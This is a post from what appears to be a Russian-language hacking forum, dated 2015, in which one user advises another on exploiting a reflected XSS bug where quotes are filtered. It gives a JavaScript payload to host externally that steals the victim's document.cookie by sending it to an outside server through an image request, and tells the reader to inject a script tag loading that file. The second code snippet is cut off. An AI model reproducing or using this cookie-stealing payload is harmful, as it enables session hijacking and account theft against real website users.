Тема: XSS [Mega Big Bug]
Показать сообщение отдельно

  #9  
Старый 18.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

Цитата:

Сообщение от rauf1324

все равно такое пробывал

это не активка, а пасивка
там кавычки фильтруются, тебе нужно не сразу куки дергать а подгружать js
заливаешь на хостинг файл 1.js с содержанием

code:

img = new Image(); img.src = "http://site.ru4_1.gif?"+document.cookie;

и в поле где хсс вставляешь скрипт с адресом на загруженный js

code:

">
 
Ответить с цитированием